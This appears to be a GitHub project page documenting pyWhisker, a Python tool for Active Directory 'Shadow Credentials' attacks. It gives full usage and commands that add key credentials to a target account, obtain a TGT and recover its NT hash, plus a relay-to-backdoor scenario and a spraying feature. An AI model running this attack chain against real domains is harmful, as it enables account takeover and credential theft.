pyWhisker is a Python equivalent of the original Whisker made by Elad Shamir and written in C#.

Related tags

Networking pywhisker
Overview

PyWhisker

pyWhisker is a Python equivalent of the original Whisker made by Elad Shamir and written in C#. This tool allows users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object. It's based on Impacket and on our Python equivalent of Michael Grafnetter's DSInternals called PyDSInternals. This tool, along with Dirk-jan's PKINITtools allow for a complete primitive exploitation on UNIX-based systems only.

Pre-requisites for this attack are as follows

  1. the target Domain Functional Level must be Windows Server 2016 or above.
  2. the target domain must have at least one Domain Controller running Windows Server 2016 or above.
  3. the Domain Controller to use during the attack must have its own certificate and keys (this means either the organization must have AD CS, or a PKI, a CA or something alike).
  4. the attacker must have control over an account able to write the msDs-KeyCredentialLink attribute of the target user or computer account.

Why some pre-reqs?

  • Pre-reqs 1 and 2 because the PKINIT features were introduced with Windows Server 2016.
  • Pre-req 3 because the DC needs its own certificate and keys for the session key exchange during the AS_REQ <-> AS_REP transaction.

A KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP will be raised if pre-req 3 is not met.

More information about this "Shadow Credentials" primitive

Usage

pyWhisker can be used to operate various actions on the msDs-KeyCredentialLink attribute of a target

  • list: list all current KeyCredentials ID and creation time
  • info: print all info contained in a KeyCredential structure
  • add: add a new KeyCredential to the msDs-KeyCredentialLink
  • remove: remove a KeyCredential from the msDs-KeyCredentialLink
  • clear: remove all KeyCredentials from the msDs-KeyCredentialLink
  • export: export all KeyCredentials from the msDs-KeyCredentialLink in JSON
  • import: overwrite the msDs-KeyCredentialLink with KeyCredentials from a JSON file

pyWhisker supports the following authentications

Among other things, pyWhisker supports multi-level verbosity, just append -v, -vv, ... to the command :)

usage: pywhisker.py [-h] -t TARGET_SAMNAME [-a [{list,add,remove,clear,info,export,import}]] [--use-ldaps] [-v] [-q] [--dc-ip ip address] [-d DOMAIN] [-u USER]
                    [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k] [-P PFX_PASSWORD] [-f FILENAME] [-e {PEM, PFX}] [-D DEVICE_ID]

Python (re)setter for property msDS-KeyCredentialLink for Shadow Credentials attacks.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET_SAMNAME, --target TARGET_SAMNAME
                        Target account
  -a [{list,add,remove,clear,info,export,import}], --action [{list,add,remove,clear,info,export,import}]
                        Action to operate on msDS-KeyCredentialLink
  --use-ldaps           Use LDAPS instead of LDAP
  -v, --verbose         verbosity level (-v for verbose, -vv for debug)
  -q, --quiet           show no information at all

authentication & connection:
  --dc-ip ip address    IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
  -d DOMAIN, --domain DOMAIN
                        (FQDN) domain to authenticate to
  -u USER, --user USER  user to authenticate with

  --no-pass             don't ask for password (useful for -k)
  -p PASSWORD, --password PASSWORD
                        password to authenticate with
  -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
                        NT/LM hashes, format is LMhash:NThash
  --aes-key hex key     AES key to use for Kerberos Authentication (128 or 256 bits)
  -k, --kerberos        Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the
                        command line

arguments when setting -action to add:
  -P PFX_PASSWORD, --pfx-password PFX_PASSWORD
                        password for the PFX stored self-signed certificate (will be random if not set, not needed when exporting to PEM)
  -f FILENAME, --filename FILENAME
                        filename to store the generated self-signed PEM or PFX certificate and key, or filename for the "import"/"export" actions
  -e {PEM, PFX}, --export {PEM, PFX}
                        choose to export cert+private key in PEM or PFX (i.e. #PKCS12) (default: PFX))

arguments when setting -action to remove:
  -D DEVICE_ID, --device-id DEVICE_ID
                        device ID of the KeyCredentialLink to remove when setting -action to remove

Below are examples and screenshots of what PyWhisker can do.

List and get info

PyWhisker has the ability to list existing KeyCredentials. In addition to that, it can unfold the whole structure to show every piece of information that object contains (including the RSA public key paramaters).

python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "info" --device-id 6419739b-ff90-f5c7-0737-1331daeb7db6

Clear and remove

pyWhisker has the ability to remove specific values or clear the whole attribute.

python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id a8ce856e-9b58-61f9-8fd3-b079689eb46e

python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "clear"

Add new values

pyWhisker has the ability to generate RSA keys, a X509 certificate, a KeyCredential structure, and to write the necessary information as new values of the msDs-KeyCredentialLink attribute. The certificate can be exported in a PFX format (#PKCS12, certificate + private key protected with a password) or in a PEM format (PEM certificate, PEM private key, no password needed).

Example with the PFX format

python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename test1

Once the values are generated and added by pyWhisker, a TGT can be request with gettgtpkinit.py. The NT hash can then be recovered with getnthash.py.

python3 PKINITtools/gettgtpkinit.py -cert-pfx test1.pfx -pfx-pass xl6RyLBLqdhBlCTHJF3R domain.local/user2 user2.ccache
python3 PKINITtools/getnthash.py -key f4d6738897808edd3868fa8c60f147366c41016df623de048d600d4e2f156aa9 domain.local/user2

Example with the PEM format

python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename test2 --export PEM

Once the values are generated and added by pyWhisker, a TGT can be request with gettgtpkinit.py. The NT hash can then be recovered with getnthash.py.

python3 PKINITtools/gettgtpkinit.py -cert-pem test2_cert.pem -key-pem test2_priv.pem domain.local/user2 user2.ccache
python3 PKINITtools/getnthash.py -key 894fde81fb7cf87963e4bda9e9e288536a0508a1553f15fdf24731731cecad16 domain.local/user2

Import and Export

KeyCredentials stored in the msDs-KeyCredentialLink attribute can be parsed, structured and saved as JSON.

The JSON export can then be used to restore the msDs-KeyCredentialLink attribute in the state it was at the time of export.

Relayed authentication

A Pull Request is currently awaiting approval to include pywhisker's "adding" feature to ntlmrelayx.

Useful knowledge

User objects can't edit their own msDS-KeyCredentialLink attribute. Computer objects can. This means the following scenario could work: trigger an NTLM authentication from DC01, relay it to DC02, make pywhisker edit DC01's attribute to create a Kerberos PKINIT pre-authentication backdoor on it.

Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists.

If you encounter errors, make sure there is no time skew between your attacker host and the Key Distribution Center (usually the Domain Controller). In order to avoid that error, the certificates generated by the pyWhisker tool are valid 40 years before the current date and 40 years after.

Credits and references

  • Credits to Dirk-jan for his work on PKINITtools. We initially planned on refactoring Impacket scripts (especially gettgt.py) to implement asymmetric PKINIT pre-authentication for Kerberos. He saved us a huge deal of headaches by writing it before us!

  • Credits to the whole team behind Impacket and its contributors.

  • Credits to Elad Shamir who created the original C# tool (Whisker) and to Michael Grafnetter's who made DSInternals, a library doing most of Whisker's heavy lifting. He also was the one who made the original Black Hat demo presenting the attack primitive.

Comments
  • Is -k working?

    Is -k working?

    Hi. Thank you very much for your time writing this tool!

    I can successfully add shadow credentials when authenticating using a plaintext password but when I try the same using Kerberos authentication on the same machine in the same "session" it fails with "invalid server address". I have tested all kind of variations of the parameters such as "-d [domain]" and "--dc-ip [DC IP]" in various locations of the command but I always get the same error. Note that I have no issues using for example Impacket's secretsdump script with Kerberos in the same environment.

    I also noted that you have not used the "-k" parameter in any of your examples here so I cannot check my command against an example.

    opened by jsdhasfeds 4
  • Add shadow spray action

    Add shadow spray action

    Hey @ShutdownRepo, @p0dalirius!

    I was already going to sleep when decided to scroll Twitter a bit and... I couldn't deny myself this PR after reading about ShadowSpray.

    It's very quick and dirty and all it implements is a for loop and lack of info messages but I guess it could be helpful anyways c:

    demo

    P. S. Credits to @Dec0ne for the idea of Shadow Credentials spraying!

    opened by snovvcrash 2
  • Fix spray action

    Fix spray action

    Hey @ShutdownRepo!

    Fixed the spray action in this PR according to the issues raised by @n00py.

    For the thing to work we do need to generate a new KCL blob for each of the users from list as the owner property of the certificate actually matters. So, unfortunately, we can't go for the usability improvement you proposed in the previous PR.

    demo

    opened by snovvcrash 1
  • return hostname + FQDN when using -dc-ip

    return hostname + FQDN when using -dc-ip

    Experiencing similar issues as outlined in #2 and #3 In my case, using -dc-ip with -k was causing an error due to the DC hostname not containing the FQDN to match my kerberos ticket. Followed Impacket implementations of similar get_machine_name() methods to return the hostname with the FQDN:

    bug 
    opened by mitchmoser 1
  • Fixed Kerberos authentication error.

    Fixed Kerberos authentication error.

    Fixed a problem where when using Kerberos authentication, KDC machine name was being used to create the ldap binding, but not its ip address. If name resolution was not configured, ldap binding would not work, as the dns resolution could not be done.

    Now the script checks if the -dc-ip option is configured, it uses the -dc-ip value to perform the ldap binding.

    opened by TahiTi 0
Owner
Shutdown
Shutdown
The sequel to SquidNet. It has many of the previous features that were in the original script, however a lot of the functions that do not serve much functionality have been removed.

SquidNet2 The sequel to SquidNet. It has many of the previous features that were in the original script, however a lot of the functions that do not se

DrSquidX 5 Mar 25, 2022
TLD records archive. Revisiting the original TLDR project by mandatoryprogrammer, on the hunt for more root nameserver changes.

tldr A(nother) continuously updated historical TLD records archive. This repository is updated approximately every three hours with the results from D

Chris Partridge 11 Dec 14, 2022
openPortScanner is a port scanner made with Python!

Port Scanner made with python • Installation • Usage • Commands Installation Run this to install: $ git clone https://github.com/Miguel-Galdin0/openPo

Miguel Galdino 7 Jan 9, 2022
Very simple and tiny file sharing service written in python

Simple File sharing tool Sharing client usage (You will need to use python3 for linux) main.py --send -f file/path Optionnal flags : pwd : set a passw

null 2 Jul 26, 2022
Pywbem - A WBEM client and related utilities, written in pure Python.

Pywbem - A WBEM client and related utilities, written in pure Python Overview Pywbem is a WBEM client and WBEM indication listener and provides relate

PyWBEM Projects 39 Dec 22, 2022
IoT owl is light face detection and recognition system made for small IoT devices like raspberry pi.

IoT Owl IoT owl is light face detection and recognition system made for small IoT devices like raspberry pi. Versions Heavy with mask detection withou

Ret2Me 6 Jun 6, 2022
RollerScanner — Fast Port Scanner Written On Python

RollerScanner RollerScanner — Fast Port Scanner Written On Python Installation You should clone this repository using: git clone https://github.com/Ma

null 68 Nov 9, 2022
Simple Port Scanner script written in Python, plans is to expand upon this script to turn it into a GUI based pen testing suite

PortScanner Simple Port Scanner script written in Python, plans is to expand upon this script to turn it into a GUI based pen testing suite. #IMPORTAN

null 1 Oct 23, 2021
D-dos attack GUI tool written in python using tkinter module

ddos D-dos attack GUI tool written in python using tkinter module #to use this tool on android, do the following on termux. *. apt update *. apt upgra

null 6 Feb 5, 2022
Nexum is an open-source, remote administration tool written in Python 3

A full-featured remote administration tool written in Python 3. The goal of this project is to make the use of a remote administration tool as simple

z3phyrus 2 Nov 26, 2021
Tool written on Python that locate all up host on your subnet

HOSTSCAN Easy to use command line network host scanner. From noob to noobs. Dependencies Nmap 7.92 or superior Python 3.9 or superior All requirements

NexCreep 4 Feb 27, 2022
🎥 PYnema is a simple UDP server written in python, allows you to watch downloaded videos.

?? PYnema is a simple UDP server written in python, allows you to watch downloaded videos.

Jan Kupczyk 1 Jan 16, 2022
Simplest dashboard for WireGuard VPN written in Python w/ Flask

Hi! I'm planning the next major update for this project, please let me know if you have any suggestions or feature requests ;) You can create an issue

Donald Zou 763 Jan 2, 2023
Ip-Tracker: a script written in python for tracking Someone using targets ip-Tracker address

?? ????-?????????????? ?? Ip-Tracker is a script written in python for tracking Someone using targets ip-Tracker address It was made by Spider Anongre

Spider Anongreyhat 15 Dec 2, 2022
Qobuz-rpc - A simple discord rich presence client for qobuz written in Python

qobuz-rpc A simple discord rich presence client for qobuz written in Python It's

Raphael O. 13 Dec 15, 2022
Multiple-requests-poster - A tool to send multiple requests to a particular website written in Python

Multiple-requests-poster - A tool to send multiple requests to a particular website written in Python

RLX 2 Feb 14, 2022
A Simple Web Server made by Python3.

A Simple Web Server made by Python3.

GGN_2015 2 Nov 27, 2021
Some files casually made by @AneekBiswas

Python-Tools All Pyhthon Files are created and managed by @AneekBiswas Modules needed to be downloaded 1.CLI bagels.py random guess.py random text-tow

null 1 Feb 23, 2022
snappi-trex is a snappi plugin that allows executing scripts written using snappi with Cisco's TRex Traffic Generator

snappi-trex snappi-trex is a snappi plugin that allows executing scripts written using snappi with Cisco's TRex Traffic Generator Design snappi-trex c

Open Traffic Generator 14 Sep 7, 2022